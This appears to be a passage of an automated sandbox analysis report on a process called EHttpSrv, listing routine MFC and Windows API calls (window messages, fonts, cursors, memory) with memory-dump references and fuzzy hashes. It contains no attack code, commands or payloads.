                                                                                                                • DestroyCursor.USER32(?), ref: 204311C1
                                                                                                                • #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
                                                                                                                • #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
                                                                                                                • #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
                                                                                                                • #745.MFC80U ref: 20431250
                                                                                                                • #578.MFC80U ref: 2043125D
                                                                                                                • #741.MFC80U ref: 2043126D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#745$#741#764CursorDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3925348513-0
                                                                                                                • Opcode ID: 197ff15cbbc536f4c8d649963d6329e935b72bd93f72a301cd583617f43cb2c5
                                                                                                                • Instruction ID: 83450769d22ba5ea2da18077b8e71055b68bb0ae34810d94dd1e9f3b960c75f6
                                                                                                                • Opcode Fuzzy Hash: 197ff15cbbc536f4c8d649963d6329e935b72bd93f72a301cd583617f43cb2c5
                                                                                                                • Instruction Fuzzy Hash: AF214D700087818ED315DF64D944B9BBBE4AB54A18F108D1DF0D697690DB79A908CBA3
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,00000000,?,00000000,2047C2A9,000000FF,204610AA,00000000), ref: 20460EB9
                                                                                                                • #6232.MFC80U(00000001,?,00000000,?,00000000,2047C2A9), ref: 20460ECB
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20460EE6
                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 20460EF7
                                                                                                                • #4026.MFC80U(0000029B,?,00000000,?,00000000,2047C2A9), ref: 20460F2B
                                                                                                                • #5803.MFC80U(00000413,?,?,00000000,?,00000000,2047C2A9), ref: 20460F3D
                                                                                                                • #578.MFC80U(?,00000000,?,00000000,2047C2A9), ref: 20460F4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#310#4026#578#5803#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 1927394422-0
                                                                                                                • Opcode ID: 6d79880abb2d890cd9b834e26bed755587d6767e3dc2070f059ac3f25da627e8
                                                                                                                • Instruction ID: f4d91fef00b462b39b8f7165b100f23ca1ca97f6120ade2b4f677b82167f9e61
                                                                                                                • Opcode Fuzzy Hash: 6d79880abb2d890cd9b834e26bed755587d6767e3dc2070f059ac3f25da627e8
                                                                                                                • Instruction Fuzzy Hash: 79118171208740ABE324DB54CC45FABB7A4EB84711F108A2DF551873E0EBBCA9048A55
                                                                                                                APIs
                                                                                                                • #3793.MFC80U(?,?,?), ref: 20436B5D
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,?,?), ref: 20436B75
                                                                                                                • PtInRect.USER32(?,?,?), ref: 20436B84
                                                                                                                • SendMessageW.USER32(0000006E,0000110B,00000009,00000000), ref: 20436B9A
                                                                                                                • #1894.MFC80U(?,?,?), ref: 20436BA2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1894#2870#3793MessageRectSend
                                                                                                                • String ID: n
                                                                                                                • API String ID: 884959302-2013832146
                                                                                                                • Opcode ID: 5866f101f56c324c047dc9070cf5a48073e1388c4ebbad63f5b795759658d119
                                                                                                                • Instruction ID: 71019f4995f92062321f6225cc7bfc0385661450bec6320917ff5e80ad3be0bc
                                                                                                                • Opcode Fuzzy Hash: 5866f101f56c324c047dc9070cf5a48073e1388c4ebbad63f5b795759658d119
                                                                                                                • Instruction Fuzzy Hash: E701D6762042047BC714DB94DC81FAFB7ACABC8B28F00C61DFA45C6281DA74ED0087B5
                                                                                                                APIs
                                                                                                                • #591.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A0D9
                                                                                                                • #620.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A0E9
                                                                                                                • #620.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A0F9
                                                                                                                • #591.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A109
                                                                                                                • #587.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A119
                                                                                                                • #587.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A129
                                                                                                                • #718.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A138
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #587#591#620$#718
                                                                                                                • String ID:
                                                                                                                • API String ID: 779086787-0
                                                                                                                • Opcode ID: 55dc9b1225ac67a39df09c050b186613a022d060eedc91c6ed3d9f0b6e735293
                                                                                                                • Instruction ID: 4bfbe0f9ee4b9d9f74dec981ebf672b7e5bbcb66592917bebe203b0f831196a0
                                                                                                                • Opcode Fuzzy Hash: 55dc9b1225ac67a39df09c050b186613a022d060eedc91c6ed3d9f0b6e735293
                                                                                                                • Instruction Fuzzy Hash: 6D113C700087819BC325DF64C855BEABBE0FFA1714F44CE1DE0A6476A0DBB86609C792
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455FD5
                                                                                                                • #2651.MFC80U(000004BD,?,00000001,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 20455FE8
                                                                                                                • #2155.MFC80U(000004BD,?,00000001,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 20455FEF
                                                                                                                • #2651.MFC80U(000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 20456002
                                                                                                                • #2155.MFC80U(000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 20456009
                                                                                                                • #2651.MFC80U(000004B8,?,000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 2045601C
                                                                                                                • #2155.MFC80U(000004B8,?,000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 20456023
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: 6a4a98f91e42ad9ab78f089853cadf76208eceae4a662d1b7703a0546b412162
                                                                                                                • Instruction ID: 863103f26e4ca1df73b264e5c76b513539e611b8e07b13662bb66614aa416b65
                                                                                                                • Opcode Fuzzy Hash: 6a4a98f91e42ad9ab78f089853cadf76208eceae4a662d1b7703a0546b412162
                                                                                                                • Instruction Fuzzy Hash: C2E0ED717C0B105AE95853F05816BFF217ACB92F04FC0C51CB2565FAE0DE6D9D428394
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mallocmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2882185209-0
                                                                                                                • Opcode ID: 16eda0088e1a5efdb71a992086406c3f3cb6e23979dc3489307c2ce772580dd1
                                                                                                                • Instruction ID: 4e0b3dd741fcd93010f2d198cb1a9cbd8eb2462f2375d9f8cd808f0600696381
                                                                                                                • Opcode Fuzzy Hash: 16eda0088e1a5efdb71a992086406c3f3cb6e23979dc3489307c2ce772580dd1
                                                                                                                • Instruction Fuzzy Hash: 7A212EB15047045BC720CF999CC196BBBF8BB99604F50893EE599D3700D739EE18CAA6
                                                                                                                APIs
                                                                                                                • #764.MFC80U(89640C24,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CAB9
                                                                                                                • #764.MFC80U(CCCC0006,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CAD2
                                                                                                                • #764.MFC80U(3274046E,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CAEB
                                                                                                                • #764.MFC80U(E5E2E850,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CB04
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CBF8
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CC63
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 4171483331-0
                                                                                                                • Opcode ID: a07db5e2b5ef17b65e2b32640280f0aa3b5643831db1a4af1dde70ad20b809fb
                                                                                                                • Instruction ID: 8b597c311dad229945d0d65014c3e31015da35acb0ec0f77e7b8bb510146f47a
                                                                                                                • Opcode Fuzzy Hash: a07db5e2b5ef17b65e2b32640280f0aa3b5643831db1a4af1dde70ad20b809fb
                                                                                                                • Instruction Fuzzy Hash: 849189B1500304CFCB18CF69C481A56BBF2FF48614B988AADD8096B756CB39F949CF85
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044BFA0
                                                                                                                • EnterCriticalSection.KERNEL32(-00003A6C,?), ref: 2044C01A
                                                                                                                • EnterCriticalSection.KERNEL32(-00003A6C,?,00000000,81000000,?,?,00000000,?,00000000), ref: 2044C139
                                                                                                                • LeaveCriticalSection.KERNEL32(-00003A6C), ref: 2044C1E5
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044C2CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$#314#6751Leave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506506037-0
                                                                                                                • Opcode ID: cd4c29c1b17a92d963c63d2088b7e1b9501995bccafe37cacce562f497645b4d
                                                                                                                • Instruction ID: 1aabffa1d9b2c20e7814515fd4c05f6d6d675276f08e87f32a92343a013f52db
                                                                                                                • Opcode Fuzzy Hash: cd4c29c1b17a92d963c63d2088b7e1b9501995bccafe37cacce562f497645b4d
                                                                                                                • Instruction Fuzzy Hash: BC91D1715087408BD761CFA4C891B9FB7E8BF91B08F10C91DF58997290DB78AA45CBA3
                                                                                                                APIs
                                                                                                                • memmove_s.MSVCR80 ref: 2043F742
                                                                                                                • #1176.MFC80U(FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F7BB
                                                                                                                • #1176.MFC80U(?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F7E0
                                                                                                                • #6282.MFC80U(?,?,?,?,?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F81E
                                                                                                                • #5316.MFC80U(?,?,?,?,?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F854
                                                                                                                • #1172.MFC80U(00000003,00000000,?,?,?,?,?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8), ref: 2043F870
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176$#1172#5316#6282memmove_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 189992903-0
                                                                                                                • Opcode ID: efa184b823bbe05bf1ea6564afe0f2415fd702c19bf77f4f3cff90be8c8e7e34
                                                                                                                • Instruction ID: 89ce70431d1a0a37f86b060fd4245eb7056398a8d95b8d4857f3a984e6c9254d
                                                                                                                • Opcode Fuzzy Hash: efa184b823bbe05bf1ea6564afe0f2415fd702c19bf77f4f3cff90be8c8e7e34
                                                                                                                • Instruction Fuzzy Hash: 2D51DF7160831A8FC328DF88C880A56B7A5FF58724F29C62DE94887311DB75E905CBD1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D2E0: #359.MFC80U(00000000,FEEA6C22), ref: 2042D320
                                                                                                                  • Part of subcall function 2042D2E0: memset.MSVCR80 ref: 2042D33C
                                                                                                                  • Part of subcall function 2042D2E0: #3998.MFC80U(?,00000000,FEEA6C22), ref: 2042D370
                                                                                                                  • Part of subcall function 2042D2E0: #6735.MFC80U(?,?,00000000,FEEA6C22), ref: 2042D382
                                                                                                                  • Part of subcall function 2042D2E0: #5832.MFC80U(?,?), ref: 2042D39F
                                                                                                                  • Part of subcall function 2042D2E0: #578.MFC80U(?,?), ref: 2042D3B0
                                                                                                                  • Part of subcall function 2042D2E0: #3828.MFC80U(?,00000000), ref: 2042D3C6
                                                                                                                  • Part of subcall function 2042D2E0: #2011.MFC80U(00000000,FEEA6C22), ref: 2042D3CD
                                                                                                                  • Part of subcall function 2042D2E0: #607.MFC80U(?,00000000), ref: 2042D3E3
                                                                                                                  • Part of subcall function 204179F0: #1176.MFC80U(00000001,?,?,?,20428CCC,?,00000001), ref: 20417A3B
                                                                                                                • #310.MFC80U(?,00000001), ref: 20428CF3
                                                                                                                • #2311.MFC80U(?,2048A5C0,?,?), ref: 20428D34
                                                                                                                • SendMessageW.USER32(?,00000181,-00000001,?), ref: 20428D63
                                                                                                                • SendMessageW.USER32(?,0000019A,-00000001,00000005), ref: 20428D82
                                                                                                                • #2155.MFC80U(00000001), ref: 20428DB1
                                                                                                                • #578.MFC80U ref: 20428DD6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578MessageSend$#1176#2011#2155#2311#310#359#3828#3998#5832#607#6735memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2206005235-0
                                                                                                                • Opcode ID: 5d98db17271ceefec40e4686cedd3b400c23290e0028667f441ba2ae5cb3a62e
                                                                                                                • Instruction ID: a991864db3a0a3185713833567a21807db3ec07bc176c53f6d209b427fa1a97f
                                                                                                                • Opcode Fuzzy Hash: 5d98db17271ceefec40e4686cedd3b400c23290e0028667f441ba2ae5cb3a62e
                                                                                                                • Instruction Fuzzy Hash: 925194712187819FC320DBB4C891FEBB7E5BB54718F008A2DE5A9876D1DB38A904C792
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20437980: CopyRect.USER32(?,?), ref: 204379CC
                                                                                                                  • Part of subcall function 20437980: #310.MFC80U(?,?,?,?), ref: 204379D6
                                                                                                                  • Part of subcall function 20437980: SendMessageW.USER32(00000020,00001200,00000000,00000000), ref: 20437A02
                                                                                                                  • Part of subcall function 20437980: #578.MFC80U ref: 20437A18
                                                                                                                • SetTextColor.GDI32(?,?), ref: 20438333
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 20438363
                                                                                                                • GetObjectW.GDI32(00000000,0000005C,?), ref: 20438375
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 2043838C
                                                                                                                • #1271.MFC80U(00000000), ref: 20438395
                                                                                                                • SelectObject.GDI32(?), ref: 204383B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$#1271#310#578ColorCopyCreateCurrentFontIndirectMessageRectSelectSendText
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284396756-0
                                                                                                                • Opcode ID: 8705216cc76b13d0f737ef574a491e92388a5e8e7d4070be1353ec410c3028ca
                                                                                                                • Instruction ID: 484de9f246bdf82a8301fbaf3a63fc84f0942e2abdd496c54fb230ee13603b97
                                                                                                                • Opcode Fuzzy Hash: 8705216cc76b13d0f737ef574a491e92388a5e8e7d4070be1353ec410c3028ca
                                                                                                                • Instruction Fuzzy Hash: 7C41D6B22007019BD720CFA4D885B67F7E4FF89754F208A1DEA5587B91DB39E904CB51
                                                                                                                APIs
                                                                                                                • #2361.MFC80U(?), ref: 204544CA
                                                                                                                • #2860.MFC80U(00000000,?), ref: 204544E2
                                                                                                                • #3396.MFC80U(00000000,00000000,00000000,?,00000000,?), ref: 20454535
                                                                                                                • #3396.MFC80U(00000000,00000000,00000001,?,00000000,00000000,00000000,?,00000000,?), ref: 2045454A
                                                                                                                • SendMessageW.USER32(?,00001000,00000000,00000000), ref: 20454567
                                                                                                                • #2255.MFC80U(?,00000000), ref: 20454579
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3396$#2255#2361#2860MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1954174168-0
                                                                                                                • Opcode ID: cb7de2568d13e4670ff08f8d41b71d634ad4678d3c454fbf4b0aead7b3e26e92
                                                                                                                • Instruction ID: c5855179c074373f60ae8c677f0082ddd0828e8fe3e3ea2248cd01ddea852f80
                                                                                                                • Opcode Fuzzy Hash: cb7de2568d13e4670ff08f8d41b71d634ad4678d3c454fbf4b0aead7b3e26e92
                                                                                                                • Instruction Fuzzy Hash: 2541A272204205AFC304CF58D880FAAF7E5EBD8324F00C62EFA499B291D675E849CB91
                                                                                                                APIs
                                                                                                                • #2361.MFC80U(?), ref: 2046061A
                                                                                                                • #2860.MFC80U(00000000,?), ref: 20460632
                                                                                                                • #3396.MFC80U(00000000,00000000,00000000,?,00000000,?), ref: 20460685
                                                                                                                • #3396.MFC80U(00000000,00000000,00000001,?,00000000,00000000,00000000,?,00000000,?), ref: 2046069A
                                                                                                                • SendMessageW.USER32(?,00001000,00000000,00000000), ref: 204606B7
                                                                                                                • #2255.MFC80U(?,00000000), ref: 204606C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
